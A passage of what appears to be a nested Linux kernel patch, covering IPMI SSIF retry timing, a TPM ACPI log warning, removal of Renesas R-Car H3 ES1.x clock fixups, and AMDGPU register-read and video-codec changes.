++	resend = ssif_info->do_resend;
++	ssif_info->do_resend = false;
+ 	waiting = ssif_info->waiting_alert;
+ 	ssif_info->waiting_alert = false;
+ 	ipmi_ssif_unlock_cond(ssif_info, flags);
+ 
+ 	if (waiting)
+ 		start_get(ssif_info);
++	if (resend)
++		start_resend(ssif_info);
+ }
+ 
+ static void watch_timeout(struct timer_list *t)
+@@ -602,8 +607,6 @@ static void ssif_alert(struct i2c_client *client, enum i2c_alert_protocol type,
+ 		start_get(ssif_info);
+ }
+ 
+-static void start_resend(struct ssif_info *ssif_info);
+-
+ static void msg_done_handler(struct ssif_info *ssif_info, int result,
+ 			     unsigned char *data, unsigned int len)
+ {
+@@ -622,7 +625,6 @@ static void msg_done_handler(struct ssif_info *ssif_info, int result,
+ 
+ 			flags = ipmi_ssif_lock_cond(ssif_info, &oflags);
+ 			ssif_info->waiting_alert = true;
+-			ssif_info->rtc_us_timer = SSIF_MSG_USEC;
+ 			if (!ssif_info->stopping)
+ 				mod_timer(&ssif_info->retry_timer,
+ 					  jiffies + SSIF_MSG_JIFFIES);
+@@ -909,7 +911,13 @@ static void msg_written_handler(struct ssif_info *ssif_info, int result,
+ 	if (result < 0) {
+ 		ssif_info->retries_left--;
+ 		if (ssif_info->retries_left > 0) {
+-			start_resend(ssif_info);
++			/*
++			 * Wait the retry timeout time per the spec,
++			 * then redo the send.
++			 */
++			ssif_info->do_resend = true;
++			mod_timer(&ssif_info->retry_timer,
++				  jiffies + SSIF_REQ_RETRY_JIFFIES);
+ 			return;
+ 		}
+ 
+@@ -973,7 +981,6 @@ static void msg_written_handler(struct ssif_info *ssif_info, int result,
+ 			/* Wait a jiffie then request the next message */
+ 			ssif_info->waiting_alert = true;
+ 			ssif_info->retries_left = SSIF_RECV_RETRIES;
+-			ssif_info->rtc_us_timer = SSIF_MSG_PART_USEC;
+ 			if (!ssif_info->stopping)
+ 				mod_timer(&ssif_info->retry_timer,
+ 					  jiffies + SSIF_MSG_PART_JIFFIES);
+@@ -1320,8 +1327,10 @@ static int do_cmd(struct i2c_client *client, int len, unsigned char *msg,
+ 	ret = i2c_smbus_write_block_data(client, SSIF_IPMI_REQUEST, len, msg);
+ 	if (ret) {
+ 		retry_cnt--;
+-		if (retry_cnt > 0)
++		if (retry_cnt > 0) {
++			msleep(SSIF_REQ_RETRY_MSEC);
+ 			goto retry1;
++		}
+ 		return -ENODEV;
+ 	}
+ 
+@@ -1462,8 +1471,10 @@ retry_write:
+ 					 32, msg);
+ 	if (ret) {
+ 		retry_cnt--;
+-		if (retry_cnt > 0)
++		if (retry_cnt > 0) {
++			msleep(SSIF_REQ_RETRY_MSEC);
+ 			goto retry_write;
++		}
+ 		dev_err(&client->dev, "Could not write multi-part start, though the BMC said it could handle it.  Just limit sends to one part.\n");
+ 		return ret;
+ 	}
+diff --git a/drivers/char/tpm/eventlog/acpi.c b/drivers/char/tpm/eventlog/acpi.c
+index 0913d3eb8d518..cd266021d0103 100644
+--- a/drivers/char/tpm/eventlog/acpi.c
++++ b/drivers/char/tpm/eventlog/acpi.c
+@@ -143,8 +143,12 @@ int tpm_read_log_acpi(struct tpm_chip *chip)
+ 
+ 	ret = -EIO;
+ 	virt = acpi_os_map_iomem(start, len);
+-	if (!virt)
++	if (!virt) {
++		dev_warn(&chip->dev, "%s: Failed to map ACPI memory\n", __func__);
++		/* try EFI log next */
++		ret = -ENODEV;
+ 		goto err;
++	}
+ 
+ 	memcpy_fromio(log->bios_event_log, virt, len);
+ 
+diff --git a/drivers/clk/renesas/Kconfig b/drivers/clk/renesas/Kconfig
+index cacaf9b87d264..37632a0659d82 100644
+--- a/drivers/clk/renesas/Kconfig
++++ b/drivers/clk/renesas/Kconfig
+@@ -22,7 +22,7 @@ config CLK_RENESAS
+ 	select CLK_R8A7791 if ARCH_R8A7791 || ARCH_R8A7793
+ 	select CLK_R8A7792 if ARCH_R8A7792
+ 	select CLK_R8A7794 if ARCH_R8A7794
+-	select CLK_R8A7795 if ARCH_R8A77950 || ARCH_R8A77951
++	select CLK_R8A7795 if ARCH_R8A77951
+ 	select CLK_R8A77960 if ARCH_R8A77960
+ 	select CLK_R8A77961 if ARCH_R8A77961
+ 	select CLK_R8A77965 if ARCH_R8A77965
+diff --git a/drivers/clk/renesas/r8a7795-cpg-mssr.c b/drivers/clk/renesas/r8a7795-cpg-mssr.c
+index 301475c74f500..7a585a777d387 100644
+--- a/drivers/clk/renesas/r8a7795-cpg-mssr.c
++++ b/drivers/clk/renesas/r8a7795-cpg-mssr.c
+@@ -128,7 +128,6 @@ static struct cpg_core_clk r8a7795_core_clks[] __initdata = {
+ };
+ 
+ static struct mssr_mod_clk r8a7795_mod_clks[] __initdata = {
+-	DEF_MOD("fdp1-2",		 117,	R8A7795_CLK_S2D1), /* ES1.x */
+ 	DEF_MOD("fdp1-1",		 118,	R8A7795_CLK_S0D1),
+ 	DEF_MOD("fdp1-0",		 119,	R8A7795_CLK_S0D1),
+ 	DEF_MOD("tmu4",			 121,	R8A7795_CLK_S0D6),
+@@ -162,7 +161,6 @@ static struct mssr_mod_clk r8a7795_mod_clks[] __initdata = {
+ 	DEF_MOD("pcie1",		 318,	R8A7795_CLK_S3D1),
+ 	DEF_MOD("pcie0",		 319,	R8A7795_CLK_S3D1),
+ 	DEF_MOD("usb-dmac30",		 326,	R8A7795_CLK_S3D1),
+-	DEF_MOD("usb3-if1",		 327,	R8A7795_CLK_S3D1), /* ES1.x */
+ 	DEF_MOD("usb3-if0",		 328,	R8A7795_CLK_S3D1),
+ 	DEF_MOD("usb-dmac31",		 329,	R8A7795_CLK_S3D1),
+ 	DEF_MOD("usb-dmac0",		 330,	R8A7795_CLK_S3D1),
+@@ -187,28 +185,21 @@ static struct mssr_mod_clk r8a7795_mod_clks[] __initdata = {
+ 	DEF_MOD("hscif0",		 520,	R8A7795_CLK_S3D1),
+ 	DEF_MOD("thermal",		 522,	R8A7795_CLK_CP),
+ 	DEF_MOD("pwm",			 523,	R8A7795_CLK_S0D12),
+-	DEF_MOD("fcpvd3",		 600,	R8A7795_CLK_S2D1), /* ES1.x */
+ 	DEF_MOD("fcpvd2",		 601,	R8A7795_CLK_S0D2),
+ 	DEF_MOD("fcpvd1",		 602,	R8A7795_CLK_S0D2),
+ 	DEF_MOD("fcpvd0",		 603,	R8A7795_CLK_S0D2),
+ 	DEF_MOD("fcpvb1",		 606,	R8A7795_CLK_S0D1),
+ 	DEF_MOD("fcpvb0",		 607,	R8A7795_CLK_S0D1),
+-	DEF_MOD("fcpvi2",		 609,	R8A7795_CLK_S2D1), /* ES1.x */
+ 	DEF_MOD("fcpvi1",		 610,	R8A7795_CLK_S0D1),
+ 	DEF_MOD("fcpvi0",		 611,	R8A7795_CLK_S0D1),
+-	DEF_MOD("fcpf2",		 613,	R8A7795_CLK_S2D1), /* ES1.x */
+ 	DEF_MOD("fcpf1",		 614,	R8A7795_CLK_S0D1),
+ 	DEF_MOD("fcpf0",		 615,	R8A7795_CLK_S0D1),
+-	DEF_MOD("fcpci1",		 616,	R8A7795_CLK_S2D1), /* ES1.x */
+-	DEF_MOD("fcpci0",		 617,	R8A7795_CLK_S2D1), /* ES1.x */
+ 	DEF_MOD("fcpcs",		 619,	R8A7795_CLK_S0D1),
+-	DEF_MOD("vspd3",		 620,	R8A7795_CLK_S2D1), /* ES1.x */
+ 	DEF_MOD("vspd2",		 621,	R8A7795_CLK_S0D2),
+ 	DEF_MOD("vspd1",		 622,	R8A7795_CLK_S0D2),
+ 	DEF_MOD("vspd0",		 623,	R8A7795_CLK_S0D2),
+ 	DEF_MOD("vspbc",		 624,	R8A7795_CLK_S0D1),
+ 	DEF_MOD("vspbd",		 626,	R8A7795_CLK_S0D1),
+-	DEF_MOD("vspi2",		 629,	R8A7795_CLK_S2D1), /* ES1.x */
+ 	DEF_MOD("vspi1",		 630,	R8A7795_CLK_S0D1),
+ 	DEF_MOD("vspi0",		 631,	R8A7795_CLK_S0D1),
+ 	DEF_MOD("ehci3",		 700,	R8A7795_CLK_S3D2),
+@@ -221,7 +212,6 @@ static struct mssr_mod_clk r8a7795_mod_clks[] __initdata = {
+ 	DEF_MOD("cmm2",			 709,	R8A7795_CLK_S2D1),
+ 	DEF_MOD("cmm1",			 710,	R8A7795_CLK_S2D1),
+ 	DEF_MOD("cmm0",			 711,	R8A7795_CLK_S2D1),
+-	DEF_MOD("csi21",		 713,	R8A7795_CLK_CSI0), /* ES1.x */
+ 	DEF_MOD("csi20",		 714,	R8A7795_CLK_CSI0),
+ 	DEF_MOD("csi41",		 715,	R8A7795_CLK_CSI0),
+ 	DEF_MOD("csi40",		 716,	R8A7795_CLK_CSI0),
+@@ -350,103 +340,26 @@ static const struct rcar_gen3_cpg_pll_config cpg_pll_configs[16] __initconst = {
+ 	{ 2,		192,	1,	192,	1,	32,	},
+ };
+ 
+-static const struct soc_device_attribute r8a7795es1[] __initconst = {
++static const struct soc_device_attribute r8a7795_denylist[] __initconst = {
+ 	{ .soc_id = "r8a7795", .revision = "ES1.*" },
+ 	{ /* sentinel */ }
+ };
+ 
+-
+-	/*
+-	 * Fixups for R-Car H3 ES1.x
+-	 */
+-
+-static const unsigned int r8a7795es1_mod_nullify[] __initconst = {
+-	MOD_CLK_ID(326),			/* USB-DMAC3-0 */
+-	MOD_CLK_ID(329),			/* USB-DMAC3-1 */
+-	MOD_CLK_ID(700),			/* EHCI/OHCI3 */
+-	MOD_CLK_ID(705),			/* HS-USB-IF3 */
+-
+-};
+-
+-static const struct mssr_mod_reparent r8a7795es1_mod_reparent[] __initconst = {
+-	{ MOD_CLK_ID(118), R8A7795_CLK_S2D1 },	/* FDP1-1 */
+-	{ MOD_CLK_ID(119), R8A7795_CLK_S2D1 },	/* FDP1-0 */
+-	{ MOD_CLK_ID(121), R8A7795_CLK_S3D2 },	/* TMU4 */
+-	{ MOD_CLK_ID(217), R8A7795_CLK_S3D1 },	/* SYS-DMAC2 */
+-	{ MOD_CLK_ID(218), R8A7795_CLK_S3D1 },	/* SYS-DMAC1 */
+-	{ MOD_CLK_ID(219), R8A7795_CLK_S3D1 },	/* SYS-DMAC0 */
+-	{ MOD_CLK_ID(408), R8A7795_CLK_S3D1 },	/* INTC-AP */
+-	{ MOD_CLK_ID(501), R8A7795_CLK_S3D1 },	/* AUDMAC1 */
+-	{ MOD_CLK_ID(502), R8A7795_CLK_S3D1 },	/* AUDMAC0 */
+-	{ MOD_CLK_ID(523), R8A7795_CLK_S3D4 },	/* PWM */
+-	{ MOD_CLK_ID(601), R8A7795_CLK_S2D1 },	/* FCPVD2 */
+-	{ MOD_CLK_ID(602), R8A7795_CLK_S2D1 },	/* FCPVD1 */
+-	{ MOD_CLK_ID(603), R8A7795_CLK_S2D1 },	/* FCPVD0 */
+-	{ MOD_CLK_ID(606), R8A7795_CLK_S2D1 },	/* FCPVB1 */
+-	{ MOD_CLK_ID(607), R8A7795_CLK_S2D1 },	/* FCPVB0 */
+-	{ MOD_CLK_ID(610), R8A7795_CLK_S2D1 },	/* FCPVI1 */
+-	{ MOD_CLK_ID(611), R8A7795_CLK_S2D1 },	/* FCPVI0 */
+-	{ MOD_CLK_ID(614), R8A7795_CLK_S2D1 },	/* FCPF1 */
+-	{ MOD_CLK_ID(615), R8A7795_CLK_S2D1 },	/* FCPF0 */
+-	{ MOD_CLK_ID(619), R8A7795_CLK_S2D1 },	/* FCPCS */
+-	{ MOD_CLK_ID(621), R8A7795_CLK_S2D1 },	/* VSPD2 */
+-	{ MOD_CLK_ID(622), R8A7795_CLK_S2D1 },	/* VSPD1 */
+-	{ MOD_CLK_ID(623), R8A7795_CLK_S2D1 },	/* VSPD0 */
+-	{ MOD_CLK_ID(624), R8A7795_CLK_S2D1 },	/* VSPBC */
+-	{ MOD_CLK_ID(626), R8A7795_CLK_S2D1 },	/* VSPBD */
+-	{ MOD_CLK_ID(630), R8A7795_CLK_S2D1 },	/* VSPI1 */
+-	{ MOD_CLK_ID(631), R8A7795_CLK_S2D1 },	/* VSPI0 */
+-	{ MOD_CLK_ID(804), R8A7795_CLK_S2D1 },	/* VIN7 */
+-	{ MOD_CLK_ID(805), R8A7795_CLK_S2D1 },	/* VIN6 */
+-	{ MOD_CLK_ID(806), R8A7795_CLK_S2D1 },	/* VIN5 */
+-	{ MOD_CLK_ID(807), R8A7795_CLK_S2D1 },	/* VIN4 */
+-	{ MOD_CLK_ID(808), R8A7795_CLK_S2D1 },	/* VIN3 */
+-	{ MOD_CLK_ID(809), R8A7795_CLK_S2D1 },	/* VIN2 */
+-	{ MOD_CLK_ID(810), R8A7795_CLK_S2D1 },	/* VIN1 */
+-	{ MOD_CLK_ID(811), R8A7795_CLK_S2D1 },	/* VIN0 */
+-	{ MOD_CLK_ID(812), R8A7795_CLK_S3D2 },	/* EAVB-IF */
+-	{ MOD_CLK_ID(820), R8A7795_CLK_S2D1 },	/* IMR3 */
+-	{ MOD_CLK_ID(821), R8A7795_CLK_S2D1 },	/* IMR2 */
+-	{ MOD_CLK_ID(822), R8A7795_CLK_S2D1 },	/* IMR1 */
+-	{ MOD_CLK_ID(823), R8A7795_CLK_S2D1 },	/* IMR0 */
+-	{ MOD_CLK_ID(905), R8A7795_CLK_CP },	/* GPIO7 */
+-	{ MOD_CLK_ID(906), R8A7795_CLK_CP },	/* GPIO6 */
+-	{ MOD_CLK_ID(907), R8A7795_CLK_CP },	/* GPIO5 */
+-	{ MOD_CLK_ID(908), R8A7795_CLK_CP },	/* GPIO4 */
+-	{ MOD_CLK_ID(909), R8A7795_CLK_CP },	/* GPIO3 */
+-	{ MOD_CLK_ID(910), R8A7795_CLK_CP },	/* GPIO2 */
+-	{ MOD_CLK_ID(911), R8A7795_CLK_CP },	/* GPIO1 */
+-	{ MOD_CLK_ID(912), R8A7795_CLK_CP },	/* GPIO0 */
+-	{ MOD_CLK_ID(918), R8A7795_CLK_S3D2 },	/* I2C6 */
+-	{ MOD_CLK_ID(919), R8A7795_CLK_S3D2 },	/* I2C5 */
+-	{ MOD_CLK_ID(927), R8A7795_CLK_S3D2 },	/* I2C4 */
+-	{ MOD_CLK_ID(928), R8A7795_CLK_S3D2 },	/* I2C3 */
+-};
+-
+-
+-	/*
+-	 * Fixups for R-Car H3 ES2.x
+-	 */
+-
+-static const unsigned int r8a7795es2_mod_nullify[] __initconst = {
+-	MOD_CLK_ID(117),			/* FDP1-2 */
+-	MOD_CLK_ID(327),			/* USB3-IF1 */
+-	MOD_CLK_ID(600),			/* FCPVD3 */
+-	MOD_CLK_ID(609),			/* FCPVI2 */
+-	MOD_CLK_ID(613),			/* FCPF2 */
+-	MOD_CLK_ID(616),			/* FCPCI1 */
+-	MOD_CLK_ID(617),			/* FCPCI0 */
+-	MOD_CLK_ID(620),			/* VSPD3 */
+-	MOD_CLK_ID(629),			/* VSPI2 */
+-	MOD_CLK_ID(713),			/* CSI21 */
+-};
+-
+ static int __init r8a7795_cpg_mssr_init(struct device *dev)
+ {
+ 	const struct rcar_gen3_cpg_pll_config *cpg_pll_config;
+ 	u32 cpg_mode;
+ 	int error;
+ 
++	/*
++	 * We panic here to ensure removed SoCs and clk updates are always in
++	 * sync, to avoid overclocking damage. The panic can only be seen with
++	 * the command-line args 'earlycon keep_bootcon', but these SoCs were
++	 * for developers only anyhow.
++	 */
++	if (soc_device_match(r8a7795_denylist))
++		panic("SoC not supported anymore!\n");
++
+ 	error = rcar_rst_read_mode_pins(&cpg_mode);
+ 	if (error)
+ 		return error;
+@@ -457,25 +370,6 @@ static int __init r8a7795_cpg_mssr_init(struct device *dev)
+ 		return -EINVAL;
+ 	}
+ 
+-	if (soc_device_match(r8a7795es1)) {
+-		cpg_core_nullify_range(r8a7795_core_clks,
+-				       ARRAY_SIZE(r8a7795_core_clks),
+-				       R8A7795_CLK_S0D2, R8A7795_CLK_S0D12);
+-		mssr_mod_nullify(r8a7795_mod_clks,
+-				 ARRAY_SIZE(r8a7795_mod_clks),
+-				 r8a7795es1_mod_nullify,
+-				 ARRAY_SIZE(r8a7795es1_mod_nullify));
+-		mssr_mod_reparent(r8a7795_mod_clks,
+-				  ARRAY_SIZE(r8a7795_mod_clks),
+-				  r8a7795es1_mod_reparent,
+-				  ARRAY_SIZE(r8a7795es1_mod_reparent));
+-	} else {
+-		mssr_mod_nullify(r8a7795_mod_clks,
+-				 ARRAY_SIZE(r8a7795_mod_clks),
+-				 r8a7795es2_mod_nullify,
+-				 ARRAY_SIZE(r8a7795es2_mod_nullify));
+-	}
+-
+ 	return rcar_gen3_cpg_init(cpg_pll_config, CLK_EXTALR, cpg_mode);
+ }
+ 
+diff --git a/drivers/clk/renesas/rcar-gen3-cpg.c b/drivers/clk/renesas/rcar-gen3-cpg.c
+index e668f23c75e7d..b3ef62fa612e3 100644
+--- a/drivers/clk/renesas/rcar-gen3-cpg.c
++++ b/drivers/clk/renesas/rcar-gen3-cpg.c
+@@ -310,19 +310,10 @@ static unsigned int cpg_clk_extalr __initdata;
+ static u32 cpg_mode __initdata;
+ static u32 cpg_quirks __initdata;
+ 
+-#define PLL_ERRATA	BIT(0)		/* Missing PLL0/2/4 post-divider */
+ #define RCKCR_CKSEL	BIT(1)		/* Manual RCLK parent selection */
+ 
+ 
+ static const struct soc_device_attribute cpg_quirks_match[] __initconst = {
+-	{
+-		.soc_id = "r8a7795", .revision = "ES1.0",
+-		.data = (void *)(PLL_ERRATA | RCKCR_CKSEL),
+-	},
+-	{
+-		.soc_id = "r8a7795", .revision = "ES1.*",
+-		.data = (void *)(RCKCR_CKSEL),
+-	},
+ 	{
+ 		.soc_id = "r8a7796", .revision = "ES1.0",
+ 		.data = (void *)(RCKCR_CKSEL),
+@@ -355,9 +346,8 @@ struct clk * __init rcar_gen3_cpg_clk_register(struct device *dev,
+ 		 * multiplier when cpufreq changes between normal and boost
+ 		 * modes.
+ 		 */
+-		mult = (cpg_quirks & PLL_ERRATA) ? 4 : 2;
+ 		return cpg_pll_clk_register(core->name, __clk_get_name(parent),
+-					    base, mult, CPG_PLL0CR, 0);
++					    base, 2, CPG_PLL0CR, 0);
+ 
+ 	case CLK_TYPE_GEN3_PLL1:
+ 		mult = cpg_pll_config->pll1_mult;
+@@ -370,9 +360,8 @@ struct clk * __init rcar_gen3_cpg_clk_register(struct device *dev,
+ 		 * multiplier when cpufreq changes between normal and boost
+ 		 * modes.
+ 		 */
+-		mult = (cpg_quirks & PLL_ERRATA) ? 4 : 2;
+ 		return cpg_pll_clk_register(core->name, __clk_get_name(parent),
+-					    base, mult, CPG_PLL2CR, 2);
++					    base, 2, CPG_PLL2CR, 2);
+ 
+ 	case CLK_TYPE_GEN3_PLL3:
+ 		mult = cpg_pll_config->pll3_mult;
+@@ -388,8 +377,6 @@ struct clk * __init rcar_gen3_cpg_clk_register(struct device *dev,
+ 		 */
+ 		value = readl(base + CPG_PLL4CR);
+ 		mult = (((value >> 24) & 0x7f) + 1) * 2;
+-		if (cpg_quirks & PLL_ERRATA)
+-			mult *= 2;
+ 		break;
+ 
+ 	case CLK_TYPE_GEN3_SDH:
+diff --git a/drivers/clk/renesas/renesas-cpg-mssr.c b/drivers/clk/renesas/renesas-cpg-mssr.c
+index 1a0cdf001b2f2..523fd45231571 100644
+--- a/drivers/clk/renesas/renesas-cpg-mssr.c
++++ b/drivers/clk/renesas/renesas-cpg-mssr.c
+@@ -1113,19 +1113,6 @@ static int __init cpg_mssr_init(void)
+ 
+ subsys_initcall(cpg_mssr_init);
+ 
+-void __init cpg_core_nullify_range(struct cpg_core_clk *core_clks,
+-				   unsigned int num_core_clks,
+-				   unsigned int first_clk,
+-				   unsigned int last_clk)
+-{
+-	unsigned int i;
+-
+-	for (i = 0; i < num_core_clks; i++)
+-		if (core_clks[i].id >= first_clk &&
+-		    core_clks[i].id <= last_clk)
+-			core_clks[i].name = NULL;
+-}
+-
+ void __init mssr_mod_nullify(struct mssr_mod_clk *mod_clks,
+ 			     unsigned int num_mod_clks,
+ 			     const unsigned int *clks, unsigned int n)
+@@ -1139,19 +1126,5 @@ void __init mssr_mod_nullify(struct mssr_mod_clk *mod_clks,
+ 		}
+ }
+ 
+-void __init mssr_mod_reparent(struct mssr_mod_clk *mod_clks,
+-			      unsigned int num_mod_clks,
+-			      const struct mssr_mod_reparent *clks,
+-			      unsigned int n)
+-{
+-	unsigned int i, j;
+-
+-	for (i = 0, j = 0; i < num_mod_clks && j < n; i++)
+-		if (mod_clks[i].id == clks[j].clk) {
+-			mod_clks[i].parent = clks[j].parent;
+-			j++;
+-		}
+-}
+-
+ MODULE_DESCRIPTION("Renesas CPG/MSSR Driver");
+ MODULE_LICENSE("GPL v2");
+diff --git a/drivers/clk/renesas/renesas-cpg-mssr.h b/drivers/clk/renesas/renesas-cpg-mssr.h
+index 1c3c057d17f53..80c5b462924ac 100644
+--- a/drivers/clk/renesas/renesas-cpg-mssr.h
++++ b/drivers/clk/renesas/renesas-cpg-mssr.h
+@@ -187,21 +187,7 @@ void __init cpg_mssr_early_init(struct device_node *np,
+     /*
+      * Helpers for fixing up clock tables depending on SoC revision
+      */
+-
+-struct mssr_mod_reparent {
+-	unsigned int clk, parent;
+-};
+-
+-
+-extern void cpg_core_nullify_range(struct cpg_core_clk *core_clks,
+-				   unsigned int num_core_clks,
+-				   unsigned int first_clk,
+-				   unsigned int last_clk);
+ extern void mssr_mod_nullify(struct mssr_mod_clk *mod_clks,
+ 			     unsigned int num_mod_clks,
+ 			     const unsigned int *clks, unsigned int n);
+-extern void mssr_mod_reparent(struct mssr_mod_clk *mod_clks,
+-			      unsigned int num_mod_clks,
+-			      const struct mssr_mod_reparent *clks,
+-			      unsigned int n);
+ #endif
+diff --git a/drivers/gpu/drm/amd/amdgpu/nv.c b/drivers/gpu/drm/amd/amdgpu/nv.c
+index 6853b93ac82e7..df3388e8dec00 100644
+--- a/drivers/gpu/drm/amd/amdgpu/nv.c
++++ b/drivers/gpu/drm/amd/amdgpu/nv.c
+@@ -393,9 +393,10 @@ static int nv_read_register(struct amdgpu_device *adev, u32 se_num,
+ 	*value = 0;
+ 	for (i = 0; i < ARRAY_SIZE(nv_allowed_read_registers); i++) {
+ 		en = &nv_allowed_read_registers[i];
+-		if (adev->reg_offset[en->hwip][en->inst] &&
+-		    reg_offset != (adev->reg_offset[en->hwip][en->inst][en->seg]
+-				   + en->reg_offset))
++		if (!adev->reg_offset[en->hwip][en->inst])
++			continue;
++		else if (reg_offset != (adev->reg_offset[en->hwip][en->inst][en->seg]
++					+ en->reg_offset))
+ 			continue;
+ 
+ 		*value = nv_get_register_value(adev,
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc15.c b/drivers/gpu/drm/amd/amdgpu/soc15.c
+index 7cd17dda32ceb..2eddd7f6cd41e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc15.c
++++ b/drivers/gpu/drm/amd/amdgpu/soc15.c
+@@ -439,8 +439,9 @@ static int soc15_read_register(struct amdgpu_device *adev, u32 se_num,
+ 	*value = 0;
+ 	for (i = 0; i < ARRAY_SIZE(soc15_allowed_read_registers); i++) {
+ 		en = &soc15_allowed_read_registers[i];
+-		if (adev->reg_offset[en->hwip][en->inst] &&
+-			reg_offset != (adev->reg_offset[en->hwip][en->inst][en->seg]
++		if (!adev->reg_offset[en->hwip][en->inst])
++			continue;
++		else if (reg_offset != (adev->reg_offset[en->hwip][en->inst][en->seg]
+ 					+ en->reg_offset))
+ 			continue;
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc21.c b/drivers/gpu/drm/amd/amdgpu/soc21.c
+index 230e15fed755c..9c52af5005253 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc21.c
++++ b/drivers/gpu/drm/amd/amdgpu/soc21.c
+@@ -47,19 +47,31 @@
+ static const struct amd_ip_funcs soc21_common_ip_funcs;
+ 
+ /* SOC21 */
+-static const struct amdgpu_video_codec_info vcn_4_0_0_video_codecs_encode_array[] =
++static const struct amdgpu_video_codec_info vcn_4_0_0_video_codecs_encode_array_vcn0[] =
+ {
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 2304, 0)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 4096, 2304, 0)},
+ };
+ 
+-static const struct amdgpu_video_codecs vcn_4_0_0_video_codecs_encode =
++static const struct amdgpu_video_codec_info vcn_4_0_0_video_codecs_encode_array_vcn1[] =
+ {
+-	.codec_count = ARRAY_SIZE(vcn_4_0_0_video_codecs_encode_array),
+-	.codec_array = vcn_4_0_0_video_codecs_encode_array,
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 2304, 0)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 4096, 2304, 0)},
++};
++
++static const struct amdgpu_video_codecs vcn_4_0_0_video_codecs_encode_vcn0 =
++{
++	.codec_count = ARRAY_SIZE(vcn_4_0_0_video_codecs_encode_array_vcn0),
++	.codec_array = vcn_4_0_0_video_codecs_encode_array_vcn0,
++};
++
++static const struct amdgpu_video_codecs vcn_4_0_0_video_codecs_encode_vcn1 =
++{
++	.codec_count = ARRAY_SIZE(vcn_4_0_0_video_codecs_encode_array_vcn1),
++	.codec_array = vcn_4_0_0_video_codecs_encode_array_vcn1,
+ };
+ 
+-static const struct amdgpu_video_codec_info vcn_4_0_0_video_codecs_decode_array[] =
++static const struct amdgpu_video_codec_info vcn_4_0_0_video_codecs_decode_array_vcn0[] =
+ {
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4096, 52)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 8192, 4352, 186)},
+@@ -68,23 +80,47 @@ static const struct amdgpu_video_codec_info vcn_4_0_0_video_codecs_decode_array[
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_AV1, 8192, 4352, 0)},
+ };
+ 
+-static const struct amdgpu_video_codecs vcn_4_0_0_video_codecs_decode =
++static const struct amdgpu_video_codec_info vcn_4_0_0_video_codecs_decode_array_vcn1[] =
++{
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4096, 52)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 8192, 4352, 186)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_JPEG, 4096, 4096, 0)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VP9, 8192, 4352, 0)},
++};
++
++static const struct amdgpu_video_codecs vcn_4_0_0_video_codecs_decode_vcn0 =
++{
++	.codec_count = ARRAY_SIZE(vcn_4_0_0_video_codecs_decode_array_vcn0),
++	.codec_array = vcn_4_0_0_video_codecs_decode_array_vcn0,
++};
++
++static const struct amdgpu_video_codecs vcn_4_0_0_video_codecs_decode_vcn1 =
+ {
+-	.codec_count = ARRAY_SIZE(vcn_4_0_0_video_codecs_decode_array),
+-	.codec_array = vcn_4_0_0_video_codecs_decode_array,
++	.codec_count = ARRAY_SIZE(vcn_4_0_0_video_codecs_decode_array_vcn1),
++	.codec_array = vcn_4_0_0_video_codecs_decode_array_vcn1,
+ };
+ 
+ static int soc21_query_video_codecs(struct amdgpu_device *adev, bool encode,
+ 				 const struct amdgpu_video_codecs **codecs)
+ {
+-	switch (adev->ip_versions[UVD_HWIP][0]) {
++	if (adev->vcn.num_vcn_inst == hweight8(adev->vcn.harvest_config))
++		return -EINVAL;
+ 
++	switch (adev->ip_versions[UVD_HWIP][0]) {
+ 	case IP_VERSION(4, 0, 0):
+ 	case IP_VERSION(4, 0, 2):
+-		if (encode)
+-			*codecs = &vcn_4_0_0_video_codecs_encode;
+-		else
+-			*codecs = &vcn_4_0_0_video_codecs_decode;
++	case IP_VERSION(4, 0, 4):
++		if (adev->vcn.harvest_config & AMDGPU_VCN_HARVEST_VCN0) {
++			if (encode)
++				*codecs = &vcn_4_0_0_video_codecs_encode_vcn1;
++			else
++				*codecs = &vcn_4_0_0_video_codecs_decode_vcn1;
++		} else {
++			if (encode)
++				*codecs = &vcn_4_0_0_video_codecs_encode_vcn0;
++			else
++				*codecs = &vcn_4_0_0_video_codecs_decode_vcn0;
++		}
+ 		return 0;
+ 	default:
+ 		return -EINVAL;
+@@ -254,9 +290,10 @@ static int soc21_read_register(struct amdgpu_device *adev, u32 se_num,
+ 	*value = 0;
+ 	for (i = 0; i < ARRAY_SIZE(soc21_allowed_read_registers); i++) {
+ 		en = &soc21_allowed_read_registers[i];
+-		if (adev->reg_offset[en->hwip][en->inst] &&
+-		    reg_offset != (adev->reg_offset[en->hwip][en->inst][en->seg]
+-				   + en->reg_offset))
++		if (!adev->reg_offset[en->hwip][en->inst])
++			continue;
++		else if (reg_offset != (adev->reg_offset[en->hwip][en->inst][en->seg]
++					+ en->reg_offset))
+ 			continue;
+ 
+ 		*value = soc21_get_register_value(adev,
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_doorbell.c b/drivers/gpu/drm/amd/amdkfd/kfd_doorbell.c
+index cd4e61bf04939..3ac599f74fea8 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_doorbell.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_doorbell.c
+@@ -280,7 +280,7 @@ phys_addr_t kfd_get_process_doorbells(struct kfd_process_device *pdd)
+ 	if (!pdd->doorbell_index) {
+ 		int r = kfd_alloc_process_doorbells(pdd->dev,
+ 						    &pdd->doorbell_index);
+-		if (r)
++		if (r < 0)
+ 			return 0;
